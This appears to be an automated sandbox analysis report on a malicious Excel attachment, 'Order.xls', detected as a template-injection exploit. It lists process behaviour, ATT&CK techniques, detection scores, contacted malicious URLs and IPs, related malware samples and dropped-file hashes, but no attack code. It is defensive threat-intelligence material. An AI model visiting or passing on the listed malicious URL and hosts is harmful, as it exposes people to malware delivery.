Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: Order.xlsStream path 'Workbook' entropy: 7.99915790275 (max. 8.0)
Source: 3F630000.0.drStream path 'Workbook' entropy: 7.99610459275 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 635Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts3
Exploitation for Client Execution
1
Scripting
1
Process Injection
3
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Disable or Modify Tools
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Virtualization/Sandbox Evasion
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Process Injection
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets1
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Order.xls37%ReversingLabsDocument-Excel.Exploit.TempInj
Order.xls100%AviraEXP/TempInj.MN
Order.xls100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://s.deemos.com/ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
s.deemos.com
14.103.79.10
truefalse
    high
    s-part-0017.t-0009.t-msedge.net
    13.107.246.45
    truefalse
      high
      otelrules.svc.static.microsoft
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://s.deemos.com/ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&windowfalse
        • Avira URL Cloud: safe
        unknown
        https://otelrules.svc.static.microsoft/rules/rule170146v0s19.xmlfalse
          high
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          14.103.79.10
          s.deemos.comChina
          18002WORLDPHONE-INASNumberforInterdomainRoutingINfalse
          172.245.119.74
          unknownUnited States
          36352AS-COLOCROSSINGUSfalse
          13.107.246.45
          s-part-0017.t-0009.t-msedge.netUnited States
          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
          Joe Sandbox version:42.0.0 Malachite
          Analysis ID:1592075
          Start date and time:2025-01-15 18:23:15 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 5m 36s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
          Run name:Potential for more IOCs and behavior
          Number of analysed new started processes analysed:16
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • GSI enabled (VBA)
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:Order.xls
          Detection:MAL
          Classification:mal72.winXLS@4/14@2/3
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .xls
          • Changed system and user locale, location and keyboard layout to French - France
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Active ActiveX Object
          • Active ActiveX Object
          • Active ActiveX Object
          • Scroll down
          • Close Viewer
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SecurityHealthHost.exe, dllhost.exe, sppsvc.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 2.23.242.162, 52.109.32.97, 52.113.194.132, 52.109.89.19, 23.38.98.96, 23.38.98.104, 52.109.68.130, 20.42.65.85, 23.212.88.34, 20.42.65.94, 20.12.23.50, 40.126.32.136
          • Excluded domains from analysis (whitelisted): e1324.dscd.akamaiedge.net, odc.officeapps.live.com, slscr.update.microsoft.com, europe.odcsm1.live.com.akadns.net, otelrules.afd.azureedge.net, weu-azsc-000.roaming.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ukw-azsc-config.officeapps.live.com, res-1-tls.cdn.office.net, ecs.office.com, e40491.dscg.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, frc-azsc-000.odc.officeapps.live.com, onedscolprdeus05.eastus.cloudapp.azure.com, uci.cdn.office.net, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, onedscolprdeus23.eastu
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Report size getting too big, too many NtSetValueKey calls found.
          TimeTypeDescription
          12:25:31API Interceptor683x Sleep call for process: splwow64.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          14.103.79.10DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
            DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
              DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                P-04071A.xlsGet hashmaliciousUnknownBrowse
                  P-04071A.xlsGet hashmaliciousUnknownBrowse
                    P-04071A.xlsGet hashmaliciousUnknownBrowse
                      Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                        Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                          Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                            13.107.246.45https://pcefan.com/diary/index.php?st-manager=1&path=/click/track&id=4973&type=ranking&url=http://nam.dcv.ms/BxPVLH2cz4Get hashmaliciousHTMLPhisherBrowse
                            • nam.dcv.ms/BxPVLH2cz4
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            s.deemos.comDHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                            • 14.103.79.10
                            DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                            • 14.103.79.10
                            DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                            • 14.103.79.10
                            P-04071A.xlsGet hashmaliciousUnknownBrowse
                            • 14.103.79.10
                            P-04071A.xlsGet hashmaliciousUnknownBrowse
                            • 14.103.79.10
                            P-04071A.xlsGet hashmaliciousUnknownBrowse
                            • 14.103.79.10
                            Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 14.103.79.10
                            Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 14.103.79.10
                            Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 14.103.79.10
                            s-part-0017.t-0009.t-msedge.netrandom.exeGet hashmaliciousLiteHTTP BotBrowse
                            • 13.107.246.45
                            ACH REMITTANCE DOCUMENT 15.01.25.xlsbGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            https://tinyurl.com/AmconconstructionGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            Zohobooks Voip CaIIer left (4) voice message from +1 (___) ___-__92 [MSG ID-zNeaDpAKAIgeQjKGl].emlGet hashmaliciousHTMLPhisherBrowse
                            • 13.107.246.45
                            https://u13762205.ct.sendgrid.net/ls/click?upn=u001.2N-2FFSd8Mh5tdTcK2pEXUToH0F5-2Fq3FDo8pnKFzcXMK24EOVQRPQXOzov3WP6TeQDbpOFMAzOhzk6g52qaRBXMg-3D-3DIjNL_PKcFXsnzduNOkTk1M1BuFSXBwpDtJ5JnfBBGS8mWfSDpSIzzZrzaRAqzsWn9I2SACyGbOCQAHofmU9ue-2Bfpl8m5UVDAXfATbU3zHgCM2w6TpOzhFbmwlUQoZzHTxRoJD6sBCzgzJz3SY7rmsp-2BquYHmL2DTOkQggmMFIfKhNPVaBf8NTmimDBPZdcr9YqjF8L6hryY10MBbjsSOUH778gw-3D-3DGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            https://shunnarah.com/attorney/candace-t-brownGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            https://www.databreachtoday.com/showOnDemand.php?webinarID=6054&rf=OD_REQUEST;Get hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            https://yjdjraabb.cc.rs6.net/tn.jsp?f=001cD7EmEKntgjghgQWpq9s2lW_mstWA0PSxRR7i3h0LbK5HgiPx3gu3HduoBs_Rnxmx0i7FlZL9378mrMLd5LlF6GT3bXi2U8GDrXfdsc2qPaLW94j0wm6KbaRHgZvZZRsEDv_wILG0rjmaLTfE5xpKJl15r5SI1xPSSiQsd9YUqKeemOHvTBSlSwV6tHZZ755Z52-jrPWl0FY7ZZ-PKGQ_IxPzhJqeaH15y4Vkailf2jrOpi4MibpjQ==&c=wK30YrUWFPbHl2B1oEErLYSqPkydS65M2el3xt7vMb11ny4WQ0yJgQ==&ch=8IgRaXvzzpu7qgxKTkXdqoYWo2ml_yYytv3GcZQiibggV2wrl_cJAA==Get hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            https://aMER.ethamoskag.ru/0cUrcw3/#Mbob@bobco.comGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            MICROSOFT-CORP-MSN-AS-BLOCKUStxWVWM8Kx4.dllGet hashmaliciousWannacryBrowse
                            • 21.217.77.1
                            f5mfkHLLVe.dllGet hashmaliciousWannacryBrowse
                            • 20.66.242.32
                            q4e7rZQEkL.dllGet hashmaliciousWannacryBrowse
                            • 52.105.25.1
                            firstontario.docxGet hashmaliciousUnknownBrowse
                            • 52.109.28.46
                            bot.spc.elfGet hashmaliciousUnknownBrowse
                            • 137.135.44.74
                            bot.sh4.elfGet hashmaliciousUnknownBrowse
                            • 52.255.11.119
                            bot.ppc.elfGet hashmaliciousUnknownBrowse
                            • 52.165.65.74
                            i686.elfGet hashmaliciousMiraiBrowse
                            • 51.122.22.77
                            JRTn7b1kHg.dllGet hashmaliciousWannacryBrowse
                            • 104.211.2.237
                            arm5.elfGet hashmaliciousMiraiBrowse
                            • 20.206.57.81
                            WORLDPHONE-INASNumberforInterdomainRoutingINDHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                            • 14.103.79.10
                            DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                            • 14.103.79.10
                            DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                            • 14.103.79.10
                            P-04071A.xlsGet hashmaliciousUnknownBrowse
                            • 14.103.79.10
                            P-04071A.xlsGet hashmaliciousUnknownBrowse
                            • 14.103.79.10
                            P-04071A.xlsGet hashmaliciousUnknownBrowse
                            • 14.103.79.10
                            5.elfGet hashmaliciousUnknownBrowse
                            • 14.103.40.242
                            Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 14.103.79.10
                            Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 14.103.79.10
                            AS-COLOCROSSINGUS19MgUpI9tj.dllGet hashmaliciousWannacryBrowse
                            • 107.175.251.2
                            a-r.m-6.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                            • 23.95.72.10
                            rebirth.sh4.elfGet hashmaliciousGafgytBrowse
                            • 23.95.73.77
                            rebirth.arm4.elfGet hashmaliciousGafgytBrowse
                            • 23.95.73.77
                            m-p.s-l.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                            • 23.95.72.10
                            s-h.4-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                            • 23.95.72.10
                            rebirth.arm6.elfGet hashmaliciousGafgytBrowse
                            • 23.95.73.77
                            x-3.2-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                            • 23.95.72.10
                            rebirth.spc.elfGet hashmaliciousGafgytBrowse
                            • 23.95.73.77
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            258a5a1e95b8a911872bae9081526644RFQ # PC25-1301.xlsxGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            P-04071A.xlsGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            ProductBOMpq_v4.xlsmGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            RFQ____PC25-1301.xlsxGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            B317.xlsxGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            YYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            CY SEC AUDIT PLAN 2025.docx.docGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            H565rymIuO.docGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            No context
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):118
                            Entropy (8bit):3.5700810731231707
                            Encrypted:false
                            SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                            MD5:573220372DA4ED487441611079B623CD
                            SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                            SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                            SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):20971520
                            Entropy (8bit):8.112143835430977E-5
                            Encrypted:false
                            SSDEEP:3:Tuekk9NJtHFfs1XsExe/t:qeVJ8
                            MD5:AFDEAC461EEC32D754D8E6017E845D21
                            SHA1:5D0874C19B70638A0737696AEEE55BFCC80D7ED8
                            SHA-256:3A96B02F6A09F6A6FAC2A44A5842FF9AEB17EB4D633E48ABF6ADDF6FB447C7E2
                            SHA-512:CAB6B8F9FFDBD80210F42219BAC8F1124D6C0B6995C5128995F7F48CED8EF0F2159EA06A2CD09B1FDCD409719F94A7DB437C708D3B1FDA01FDC80141A4595FC7
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):20971520
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                            SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                            SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                            SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):71
                            Entropy (8bit):4.3462513114457515
                            Encrypted:false
                            SSDEEP:3:Tuekk9NJtHFfs1XsExen:qeVJ8u
                            MD5:8F4510F128F81A8BAF2A345D00F7E30C
                            SHA1:8C711E6C484881ECDC83B6BDAC41C7A19EDE9C37
                            SHA-256:15AA8B35FC5F139EF0B0FBC641CAA862AED19674625B81D1DC63467BC0AAFED9
                            SHA-512:78695E5E2337703757903B8452E31A98F860022B04972651212C3004FEBE29017380A8BCA9FCCFD935DE00D8BD73AA556C30A3CEA5FC76E7ADF7E7763D68E78F
                            Malicious:false
                            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:ASCII text, with very long lines (28941), with CRLF line terminators
                            Category:dropped
                            Size (bytes):20971520
                            Entropy (8bit):0.22023249538237788
                            Encrypted:false
                            SSDEEP:1536:k0MQqW+51DFCWA+QsYlIjohyj0ybDbBRQHs0LPWAVKdUTPQc1K7o4+UypjCyz4x7:aQ8RCW7YlglNGuOQ/W/BsdgO
                            MD5:C94D088950E1D6D52A702E89121E6352
                            SHA1:B0E4BC0986FDFE7D8D95263ECDC4C1AD98D0D7E0
                            SHA-256:EEE151903D73BC9A9F1776D080D83857FB0CD742B465FFD6E8B2865101BB381D
                            SHA-512:2FCC6543071B0297B3556A19EAFAFF764CE3E59A08B56F62E2FBA932F3B93C2961406B770F1CBB27E0687EE60B9DFF813BDD1CF55A20FEFCE77CBC072BC5CAC3
                            Malicious:false
                            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..01/15/2025 17:24:23.143.EXCEL (0x2110).0x21B4.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":16,"Time":"2025-01-15T17:24:23.143Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-15T17:24:22.7687099Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-15T17:24:22.7687099Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-15T17:24:22.7687099Z\", \"C\" : \"\", \"Q\" : 14.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):20971520
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                            SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                            SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                            SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:ASCII text, with very long lines (29058), with CRLF line terminators
                            Category:dropped
                            Size (bytes):314774
                            Entropy (8bit):5.120970548467699
                            Encrypted:false
                            SSDEEP:1536:xKrOoK1aqqP6zHPn5vWM/5Sqom7PgKPz+byQvcmh+IjyLTWnWsWIR1tRYOnU8ic9:Vo4zHhvWuJEy0vu2W/Bsd9
                            MD5:5358E350908713BF070C7CADD696FAA8
                            SHA1:84D5786C102B452F6878174B58DD6B9F30D350FD
                            SHA-256:91E95484610D80A72E075022F061C357DDAF9B75E5597CAB8E0CDB62FF91F0FE
                            SHA-512:48EB1EB90CFD88BB8553B0F39188FB54BB62341DA1E8A3B4792B72B4D4E719BD3B42DAB2EBF86A23BF1ED7D1AC9CFB283010AC4AFCD9CBFFA99B933DBFB50353
                            Malicious:false
                            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..01/15/2025 17:25:58.115.EXCEL (0x448).0xD18.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Identity.ConfigEnvironment","Flags":30962256044949761,"InternalSequenceNumber":17,"Time":"2025-01-15T17:25:58.115Z","Contract":"Office.System.Activity","Activity.CV":"DEVoGdnPXkSI7ONcZnP+Iw.3.1","Activity.Duration":8,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.FederationTenantId":"00000000-0000-0000-0000-000000000000","Data.FederationProviderId":"00000000-0000-0000-0000-000000000000","Data.IdP":0,"Data.FederationProviderCode":1,"Data.TelemetryRegionCode":1,"Data.CachedFileName":"0F6D8282-F036-4FAD-80E1-9C34ABBC253B","Data.CachedFileBaseHost":"Worldwide.Host","Data.CachedFileTelemetryUrl":"Default.Host"}...01/15/2025 17:25:58.146.EXCEL (0x448).0xD18.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):1536
                            Entropy (8bit):1.26710719522357
                            Encrypted:false
                            SSDEEP:6:rl912N0xs+CFfR+S8lX+lG8ElCl5XCB9Xh9X:rl3lKFN8lXanMClJCb7
                            MD5:97D7514D7DC850B44120552A5C3D0739
                            SHA1:FD782F39D463E27E1861E4E39A69EBB87BB35469
                            SHA-256:08A56B4C31CCE4B993DC979925ECF1C3234E8A27CD8A3FBDBAFBC359C27FFB91
                            SHA-512:29B0D8D01660F31D27D87208C52C38A8E82794268A8F6A7F35A38BCA8750306D61E6950028F22125193C67FB1BA90CEC272BF078C532CE186570BAABF8AA2D63
                            Malicious:false
                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
